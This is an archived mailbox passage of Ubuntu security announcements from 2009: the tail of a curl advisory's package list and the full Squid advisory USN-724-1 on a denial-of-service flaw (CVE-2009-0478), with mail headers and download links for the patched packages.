http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-gnutls-dev_7.18.2-1ubuntu4.1_amd64.deb
Size/MD5: 926082 5cc5411540ce23be3354b1f4d5fc041f
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-openssl-dev_7.18.2-1ubuntu4.1_amd64.deb
Size/MD5: 933036 adcb522fbbb4f3ab68b4fa8af804d5b7
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.2-1ubuntu4.1_i386.deb
Size/MD5: 209080 80b442fba7924160f234f6d2fc5be8ea
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.18.2-1ubuntu4.1_i386.deb
Size/MD5: 1091876 d294a4ad45febe82279359741d6958c4
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.18.2-1ubuntu4.1_i386.deb
Size/MD5: 212550 7c5a86d097564f4563cd4992c65544a9
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.18.2-1ubuntu4.1_i386.deb
Size/MD5: 219490 83026954c17912ed54036e2f81118310
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-gnutls-dev_7.18.2-1ubuntu4.1_i386.deb
Size/MD5: 899576 bb001dda2e0e9def2d08f99497adfbcd
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-openssl-dev_7.18.2-1ubuntu4.1_i386.deb
Size/MD5: 905326 74ff52579922240c1a034c0f223b1a1a
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/c/curl/curl_7.18.2-1ubuntu4.1_lpia.deb
Size/MD5: 208732 cdc604e918825dd8ca06fb07b69d90ba
http://ports.ubuntu.com/pool/main/c/curl/libcurl3-dbg_7.18.2-1ubuntu4.1_lpia.deb
Size/MD5: 1099032 5e1a71fa663f6f21944bf7078c57aebe
http://ports.ubuntu.com/pool/main/c/curl/libcurl3-gnutls_7.18.2-1ubuntu4.1_lpia.deb
Size/MD5: 210790 2486bf054d91bf5e5cd32fae20d2002a
http://ports.ubuntu.com/pool/main/c/curl/libcurl3_7.18.2-1ubuntu4.1_lpia.deb
Size/MD5: 217316 32814e9da3f6ea13b6b2a77e872f92fc
http://ports.ubuntu.com/pool/main/c/curl/libcurl4-gnutls-dev_7.18.2-1ubuntu4.1_lpia.deb
Size/MD5: 898464 3028bc84dcbc05a2a65d50f49f0ed2f0
http://ports.ubuntu.com/pool/main/c/curl/libcurl4-openssl-dev_7.18.2-1ubuntu4.1_lpia.deb
Size/MD5: 903772 00495fb44aba7d390ddb7643de104fca
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/c/curl/curl_7.18.2-1ubuntu4.1_powerpc.deb
Size/MD5: 212494 c0ad35c9fbaa7afeb9247b948bf3720e
http://ports.ubuntu.com/pool/main/c/curl/libcurl3-dbg_7.18.2-1ubuntu4.1_powerpc.deb
Size/MD5: 1130288 8a65d0227f3697b505e4634cff6831fd
http://ports.ubuntu.com/pool/main/c/curl/libcurl3-gnutls_7.18.2-1ubuntu4.1_powerpc.deb
Size/MD5: 223618 b5d5085350540d988abc19c5dcb04ea6
http://ports.ubuntu.com/pool/main/c/curl/libcurl3_7.18.2-1ubuntu4.1_powerpc.deb
Size/MD5: 229464 8053abc5beb65a37ea489eeec41ab2c2
http://ports.ubuntu.com/pool/main/c/curl/libcurl4-gnutls-dev_7.18.2-1ubuntu4.1_powerpc.deb
Size/MD5: 925362 8277d9fb3b898cf90e4fa46ffcf71147
http://ports.ubuntu.com/pool/main/c/curl/libcurl4-openssl-dev_7.18.2-1ubuntu4.1_powerpc.deb
Size/MD5: 931700 13f3edf118024e221d7f45abd05c0e7e
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/c/curl/curl_7.18.2-1ubuntu4.1_sparc.deb
Size/MD5: 209542 6478e46bb2850c50f7b4def0d86b730b
http://ports.ubuntu.com/pool/main/c/curl/libcurl3-dbg_7.18.2-1ubuntu4.1_sparc.deb
Size/MD5: 1072458 5eaf45a5c000a1f8b0d09bbab983b8ae
http://ports.ubuntu.com/pool/main/c/curl/libcurl3-gnutls_7.18.2-1ubuntu4.1_sparc.deb
Size/MD5: 209228 83c8fcd128286fd77d9983fff53d9563
http://ports.ubuntu.com/pool/main/c/curl/libcurl3_7.18.2-1ubuntu4.1_sparc.deb
Size/MD5: 213982 bf031afa898326f814e2dea63fdc0523
http://ports.ubuntu.com/pool/main/c/curl/libcurl4-gnutls-dev_7.18.2-1ubuntu4.1_sparc.deb
Size/MD5: 904780 f3ac8d6aab6a12a4b8462152e38463a9
http://ports.ubuntu.com/pool/main/c/curl/libcurl4-openssl-dev_7.18.2-1ubuntu4.1_sparc.deb
Size/MD5: 909856 c991e46b6bb3a47c79e7615f398de261
--=-vVlpg2N7rxwQ1FwKUF+4
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iEYEABECAAYFAkmtiIgACgkQLMAs/0C4zNogiQCeNKFimFzDZ3+zukGjxQanFwBl
M3EAoIzfq+FMlDv93YEBFyiUCdAI9Jqy
=sUO0
-----END PGP SIGNATURE-----
--=-vVlpg2N7rxwQ1FwKUF+4--
--==============�12105205218476806=Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
--
ubuntu-security-announce mailing list
ubuntu-security-announce@lists.ubuntu.com
Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce
--==============�12105205218476806==--
From - Thu Mar 12 12:01:14 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006917
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39727-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id F387FED787
for <lists@securityspace.com>; Thu, 12 Mar 2009 11:59:38 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 513C5143BE1; Thu, 12 Mar 2009 08:15:43 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 17455 invoked from network); 12 Mar 2009 12:31:16 -0000
Delivered-To: unknown
X-Bluewin-Spam-Analysis: v=1.0 c=1 a�6q0cyCUc8QNek+tXvRSQ==:17 a=fxJcL_dCAAAA:8 a=naBvIf12gbkYSUtLRzcA:9 a=x9DMJtNAht-e5whbRC6kwHR3mRUA:4 a=tQPsmlJHCTUA:10 a=8syroioSFNE_p0r_xLMA:9 a=JSsWRbtj2K4QUKzWHRLl7xudwpwA:4 a=rPt6xJ-oxjAA:10 a=P1drAwA31TSgsCTGxHwA:9 a=k5Y7EBnc9jxqYCPMpR8A:7 a=Nta1huVKbUs5GKbA149sw85oqDcA:4
X-Bluewin-Spam-Score: 0
X-FXIT-IP: IPv4[91.189.94.204] Epoch[1235651714]
Date: Thu, 26 Feb 2009 06:28:55 -0600
From: Jamie Strandboge <jamie@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Subject: [USN-724-1] Squid vulnerability
Message-ID: <20090226122855.GD6712@severus.strandboge.com>
MIME-Version: 1.0
User-Agent: Mutt/1.5.18 (2008-05-17)
X-Mailman-Approved-At: Thu, 26 Feb 2009 12:32:25 +0000
Cc: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
X-BeenThere: ubuntu-security-announce@lists.ubuntu.com
X-Mailman-Version: 2.1.8
Reply-To: ubuntu-users@lists.ubuntu.com,
Jamie Strandboge <jamie@canonical.com>
Content-Type: multipart/mixed; boundary="==============55106975916943733=="
Mime-version: 1.0
Sender: ubuntu-security-announce-bounces@lists.ubuntu.com
Errors-To: ubuntu-security-announce-bounces@lists.ubuntu.com
Status:
--==============55106975916943733=Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="OaZoDhBhXzo6bW1J"
Content-Disposition: inline
--OaZoDhBhXzo6bW1J
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
==========================================================Ubuntu Security Notice USN-724-1 February 25, 2009
squid vulnerability
CVE-2009-0478
==========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 8.10
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 8.10:
squid 2.7.STABLE3-1ubuntu2.1
In general, a standard system upgrade is sufficient to effect the
necessary changes.
Details follow:
Joshua Morin, Mikko Varpiola and Jukka Taimisto discovered that Squid did
not properly validate the HTTP version when processing requests. A remote
attacker could exploit this to cause a denial of service (assertion failure).
Updated packages for Ubuntu 8.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1.diff.gz
Size/MD5: 303042 9132293f589a71ae3f771e1ae6de30f1
http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1.dsc
Size/MD5: 1252 6953f88d6f4825daabd9e77bd0fa1a88
http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.7.STABLE3.orig.tar.gz
Size/MD5: 1782040 a4d7608696e2b617aa5853c7d23e25b0
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid-common_2.7.STABLE3-1ubuntu2.1_all.deb
Size/MD5: 495876 b6d1e76b140c792297c14382a06ed3e3
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1_amd64.deb
Size/MD5: 771610 7f2ca95b0497cc23f0bf26b7a6503cc7
http://security.ubuntu.com/ubuntu/pool/universe/s/squid/squid-cgi_2.7.STABLE3-1ubuntu2.1_amd64.deb
Size/MD5: 119880 27ff06a902debe143acb7b3959fb1c52
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1_i386.deb
Size/MD5: 695708 312c710ebdb46e3017b02cb672d14524
http://security.ubuntu.com/ubuntu/pool/universe/s/squid/squid-cgi_2.7.STABLE3-1ubuntu2.1_i386.deb
Size/MD5: 118638 f2f2f698523d49d8971c7a22faebc427
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1_lpia.deb
Size/MD5: 694080 6720b3aca93aabb7600a1a2c2f699af5
http://ports.ubuntu.com/pool/universe/s/squid/squid-cgi_2.7.STABLE3-1ubuntu2.1_lpia.deb
Size/MD5: 118550 7484981bd7c4c8b6361362e98d5d1631
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1_powerpc.deb
Size/MD5: 777958 b9d530e92ad4638fb8d169ef55eb33f4
http://ports.ubuntu.com/pool/universe/s/squid/squid-cgi_2.7.STABLE3-1ubuntu2.1_powerpc.deb
Size/MD5: 120446 9899cd403bbca3e0e6f5a936cd2d9955
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1_sparc.deb
Size/MD5: 719088 2781d6fd1c7adc0b76aa12670ac1abb5
http://ports.ubuntu.com/pool/universe/s/squid/squid-cgi_2.7.STABLE3-1ubuntu2.1_sparc.deb
Size/MD5: 119398 8a26b4da728c31d7bd116666191575b2